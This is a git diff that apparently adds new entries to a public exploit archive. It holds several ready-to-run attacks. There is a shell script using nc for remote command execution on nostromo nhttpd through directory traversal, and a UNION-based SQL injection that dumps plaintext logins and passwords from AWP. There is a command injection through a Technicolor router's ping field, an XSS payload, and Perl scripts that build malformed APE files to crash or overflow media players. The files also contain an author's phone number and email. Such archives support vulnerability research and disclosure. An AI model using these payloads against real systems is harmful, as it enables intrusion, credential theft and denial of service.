diff --git a/files.csv b/files.csv index 96f27b28e..04c597eae 100755 --- a/files.csv +++ b/files.csv @@ -31937,3 +31937,12 @@ id,file,description,date,author,platform,type,port 35456,platforms/php/webapps/35456.txt,"BoutikOne rss_promo.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35457,platforms/php/webapps/35457.txt,"BoutikOne rss_top10.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35459,platforms/php/webapps/35459.txt,"Cart66 Lite WordPress Ecommerce 1.5.1.17 - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80 +35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 V2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80 +35463,platforms/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection Vulnerability",2014-12-04,"Robert Cooper",cgi,webapps,80 +35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 URI Security Bypass Vulnerability",2011-03-14,"DcLabs Security Research Group",multiple,remote,0 +35465,platforms/multiple/remote/35465.pl,"VLC Media Player 1.0.5 '.ape' File Denial of Service Vulnerability",2011-03-15,KedAns-Dz,multiple,remote,0 +35466,platforms/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 Directory Traversal Remote Command Execution Vulnerability",2011-03-05,"RedTeam Pentesting GmbH",linux,remote,0 +35467,platforms/php/webapps/35467.txt,"SugarCRM <= 6.1.1 Information Disclosure Vulnerability",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0 +35468,platforms/windows/remote/35468.pl,"Monkey's Audio '.ape' File Buffer Overflow Vulnerability",2011-03-16,KedAns-Dz,windows,remote,0 +35469,platforms/php/webapps/35469.txt,"Wikiwig 5.01 Cross Site Scripting and HTML Injection Vulnerabilities",2011-03-10,"AutoSec Tools",php,webapps,0 +35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS 'page_info.php' SQL Injection Vulnerability",2011-03-16,H3X,php,webapps,0 diff --git a/platforms/cgi/webapps/35463.txt b/platforms/cgi/webapps/35463.txt new file mode 100755 index 000000000..29d494f47 --- /dev/null +++ b/platforms/cgi/webapps/35463.txt @@ -0,0 +1,20 @@ +# Exploit Title: Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerability +# Date: 12/02/2014 +# Author: Robert Cooper (robertc[at]areyousecure.net) +# Software Link: http://www.guruperl.net/products/awppro/ +# Tested on: [Linux/Windows 7] +# Vulnerable Parameter: group_id= + +############################################################## + +PoC: + +http://server/cgi/client.cgi?act=list_zone&group_id=1' + +http://server/cgi/client.cgi?act=list_zone&group_id=1 union all select 1,2,group_concat(id,0x3a,login,0x3a,password,0x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from awp_ad_client-- + +(Passwords are stored in plaintext) + +############################################################## + +http://www.areyousecure.net \ No newline at end of file diff --git a/platforms/hardware/webapps/35462.txt b/platforms/hardware/webapps/35462.txt new file mode 100755 index 000000000..fd42b8cb0 --- /dev/null +++ b/platforms/hardware/webapps/35462.txt @@ -0,0 +1,24 @@ +Product: Wireless N ADSL 2/2+ Modem Router +Firmware Version : V2.05.C29GV +Modem Type : ADSL2+ Router +Modem Vendor : Technicolor +Model: DT5130 + +Bugs: +1- Unauth Xss - CVE-2014-9142 +user=teste&password=teste& +userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer="%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login + +2- Arbitrari URL redirect - CVE-2014-9143 +failrefer=http://blog.dclabs.com.br&login=Login&password= +pass&refer=/index.html&user=1&userlevel=15 + +3- Command Injection in ping field - CVE-2014-9144 +setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE + + +-- +Ewerson Guimaraes (Crash) +Pentester/Researcher +DcLabs / Ibliss Security Team +www.dclabs.com.br / www.ibliss.com.br \ No newline at end of file diff --git a/platforms/linux/remote/35466.sh b/platforms/linux/remote/35466.sh new file mode 100755 index 000000000..70ecce34a --- /dev/null +++ b/platforms/linux/remote/35466.sh @@ -0,0 +1,33 @@ +source: http://www.securityfocus.com/bid/46880/info + +nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data. + +An attacker can exploit this issue to access arbitrary files and execute arbitrary commands with application-level privileges. + +nostromo versions prior to 1.9.4 are affected. + +#!/bin/sh +###################################### +# # +# RedTeam Pentesting GmbH # +# kontakt@redteam-pentesting.de # +# http://www.redteam-pentesting.de # +# # +###################################### + +if [ $# -lt 3 ]; then + echo "Usage: $(basename $0) HOST PORT COMMAND..." + exit 2 +fi + + +HOST="$1" +PORT="$2" +shift 2 + +( \ + echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \ + echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \ + echo "$@ 2>&1" \ +) | nc "$HOST" "$PORT" \ + | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP' \ No newline at end of file diff --git a/platforms/multiple/remote/35464.txt b/platforms/multiple/remote/35464.txt new file mode 100755 index 000000000..97ff7ee14 --- /dev/null +++ b/platforms/multiple/remote/35464.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/46864/info + +Trend Micro WebReputation API is prone to a security-bypass vulnerability. + +An attacker can exploit this issue to bypass the filter included in the download mechanism. Successful exploits may cause victims to download malicious files onto affected computers. + +This issue affects WebReputation API 10.5; other versions may also be vulnerable. + + http://www.example.com/dist/nmap-5.51-setup.exe? \ No newline at end of file diff --git a/platforms/multiple/remote/35465.pl b/platforms/multiple/remote/35465.pl new file mode 100755 index 000000000..350e06ff1 --- /dev/null +++ b/platforms/multiple/remote/35465.pl @@ -0,0 +1,58 @@ +source: http://www.securityfocus.com/bid/46868/info + +VLC Media Player is prone to a denial-of-service vulnerability. + +Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. + +VLC Media Player 1.0.5 is vulnerable; other versions may also be affected. + +#!/usr/bin/perl + +### +# Title : VLC media player v1.0.5 (.ape) Local Crash PoC +# Author : KedAns-Dz +# E-mail : ked-h@hotmail.com +# Home : HMD/AM (30008/04300) - Algeria -(00213555248701) +# Twitter page : twitter.com/kedans +# platform : Windows +# Impact : VLC media player Just Crashed +# Tested on : Windows XP SP3 Fran?ais +# Target : VLC media player v1.0.5 +### +# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) +# ------------ +# Usage : 1 - Creat APE file ( Monkey's Audio Format ) +# => 2 - Open APE file With VLC 1.0.5 +# => 3 - Crashed !!! +# ------------ +#START SYSTEM /root@MSdos/ : +system("title KedAns-Dz"); +system("color 1e"); +system("cls"); +print "\n\n"; +print " |===========================================================|\n"; +print " |= [!] Name : VLC media player v1.0.5 (Monkey's File) =|\n"; +print " |= [!] Exploit : Local Crash PoC =|\n"; +print " |= [!] Author : KedAns-Dz =|\n"; +print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n"; +print " |===========================================================|\n"; +sleep(2); +print "\n"; +# Creating ... +my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header +open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB +print file $PoC; +print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! "; +close(file); + +#================[ Exploited By KedAns-Dz * HST-Dz * ]========================= +# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > +# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ +# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX +# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , +# [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah +# Messas Secondary School - Ain mlilla - 04300 - Algeria ] , +# Greets All My Friends (cit? 1850 logts - HassiMessaouD - 30008 -Algeria ) , +# ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers . +# ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker . +#=============================================================================== \ No newline at end of file diff --git a/platforms/php/webapps/35467.txt b/platforms/php/webapps/35467.txt new file mode 100755 index 000000000..39f033ff0 --- /dev/null +++ b/platforms/php/webapps/35467.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/46885/info + +SugarCRM is prone to an information-disclosure vulnerability because it fails to restrict access to certain application data. + +Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. + + +http://www.example.org/sugarcrm/index.php?module=Accounts&action=ShowDuplicates + +http://www.example.org/sugarcrm/index.php?module=Contacts&action=ShowDuplicates \ No newline at end of file diff --git a/platforms/php/webapps/35469.txt b/platforms/php/webapps/35469.txt new file mode 100755 index 000000000..c7dde4c03 --- /dev/null +++ b/platforms/php/webapps/35469.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/46888/info + +Wikiwig is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Wikiwig 5.01 is vulnerable; other versions may also be affected. + +http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/35470.txt b/platforms/php/webapps/35470.txt new file mode 100755 index 000000000..bbe275471 --- /dev/null +++ b/platforms/php/webapps/35470.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/46896/info + +AplikaMedia CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +http://www.example.com/page_info.php?id_brt=[Sql_injection] \ No newline at end of file diff --git a/platforms/windows/remote/35468.pl b/platforms/windows/remote/35468.pl new file mode 100755 index 000000000..74647054c --- /dev/null +++ b/platforms/windows/remote/35468.pl @@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/46887/info + +Monkeyâ??s Audio is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. + +Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition. + +#!/usr/bin/perl + +### +# Title : Monkey's File Audio (All MPlayers) Buffer Overflow +# Author : KedAns-Dz +# E-mail : ked-h@hotmail.com +# Home : HMD/AM (30008/04300) - Algeria -(00213555248701) +# Twitter page : twitter.com/kedans +# platform : Windows +# Impact : Overflow & Crash's +# Tested on : Windows XP SP3 Fran?ais +# Target : All Media Players +### +# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) +# ------------ +# File Home : (http://www.monkeysaudio.com) +# Error's Detected : +# Media Player Classic v6.4.9.1 [MonkeySource.ax !0x020451a6()!] >> http://1337day.com/exploits/15581 || By KedAns-Dz +# JetAudio v5.1.5.2 [JFACMDec.dll !0x02FA1BBD()!] >> http://packetstormsecurity.org/files/view/99200/jetaudio5152ape-overflow.txt || By KedAns-Dz +# KMPlayer 2.9.3 [MACDec.dll !0x??????()!] >> http://packetstormsecurity.org/files/view/99190/kmplayerape-overflow.txt || By KedAns-Dz +# VLC media player v1.0.5 [axvlc.dll !0x??????()!] >> http://1337day.com/exploits/15595 || By KedAns-Dz +# QuickTime Player [Not Detected !!] ' Because Can not Read (APE) Files Format +# RealPlayer [Not Detected !!] ' Because Can not Read (APE) Files Format +# ------------ +#START SYSTEM /root@MSdos/ : +system("title KedAns-Dz"); +system("color 1e"); +system("cls"); +print "\n\n"; +print " |======================================================|\n"; +print " |= [!] Name : Monkey's File Audio (.ape) All Players =|\n"; +print " |= [!] Exploit : Stack Buffer Overflow =|\n"; +print " |= [!] Author : KedAns-Dz =|\n"; +print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n"; +print " |======================================================|\n"; +sleep(2); +print "\n"; +# Creating ... +my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header (16 bytes) +open(file , ">", "Kedans.ape"); # Evil File APE (4.0 KB) +print file $PoC; +print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! "; +close(file); + +#================[ Exploited By KedAns-Dz * HST-Dz * ]========================= +# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > +# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ +# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX +# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , +# [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah +# Messas Secondary School - Ain mlilla - 04300 - Algeria ] , +# Greets All Bad Boys (cit? 1850 logts - HassiMessaouD - 30008 -Algeria ) , +# hotturks.org : TeX * KadaVra ... all Others +# Kelvin.Xgr ( kelvinx.net) +#===========================================================================